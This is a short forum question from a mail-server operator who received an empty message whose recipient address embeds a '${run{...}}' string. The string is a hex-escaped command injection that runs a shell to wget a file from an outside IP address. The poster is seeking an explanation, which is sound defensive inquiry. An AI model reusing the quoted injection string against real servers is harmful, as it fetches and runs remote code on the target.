3
1
I operate my own mail server and from time to time, people send spam or mysterious stuff to the root account. Recently, I got an empty mail, which was addressed to:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@mydomain.tld
The second IP address in that string seems to be owned by the same hosting service which I rent my server from. The run and wget look very suspicious to me but I found nothing about such an attack on the Internet.
According to the server's mail log, that mail was sent from 148.72.206.111. However, The From field was set to root@sab.com.
Does anyone know, what this means?